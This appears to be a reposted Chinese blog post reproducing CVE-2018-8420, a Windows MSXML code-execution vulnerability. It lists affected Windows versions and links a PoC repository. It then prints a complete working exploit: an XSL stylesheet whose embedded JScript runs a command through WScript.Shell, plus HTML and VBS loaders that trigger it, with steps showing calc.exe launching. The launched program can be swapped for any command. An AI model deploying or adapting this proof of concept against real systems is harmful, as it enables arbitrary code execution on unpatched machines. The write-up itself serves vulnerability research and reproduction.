码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2018-8420 漏洞复现

时间:2018-12-22 01:12:22      阅读:919      评论:0      收藏:0      [点我收藏+]

标签:src   vbscript   tps   windows 8   transform   windows   dom   技术   08 r2   

影响的 Windows 版本:

Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 Version 1803 for 32-bit Systems
Microsoft Windows 10 Version 1803 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 10 version 1709 for 32-bit Systems
Microsoft Windows 10 version 1709 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for 64-bit Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 1709
Microsoft Windows Server 1803
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016

漏洞复现:

本地测试版本:Microsoft Windows Server 2008 R2 Datacenter

Poc 地址:https://github.com/Sch01ar/CVE-2018-8420

xml,调用计算器

 1 <?xml version=‘1.0‘?>
 2 <stylesheet
 3 xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
 4 xmlns:user="placeholder"
 5 version="1.0">
 6 <output method="text"/>
 7  <ms:script implements-prefix="user" language="JScript">
 8  <![CDATA[
 9  var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
10  ]]> </ms:script>
11 </stylesheet>

html

<script type="text/vbscript">
Sub POC()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
POC()
</script>

vbs

Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()

技术分享图片

打开 xml.html

 技术分享图片

技术分享图片

技术分享图片

点击,是

技术分享图片

点击,是

技术分享图片

成功弹出了计算器

直接运行 xml.vbs

技术分享图片

也成功弹出了计算器

CVE-2018-8420 漏洞复现

标签:src   vbscript   tps   windows 8   transform   windows   dom   技术   08 r2   

原文地址:https://www.cnblogs.com/sch01ar/p/10159380.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!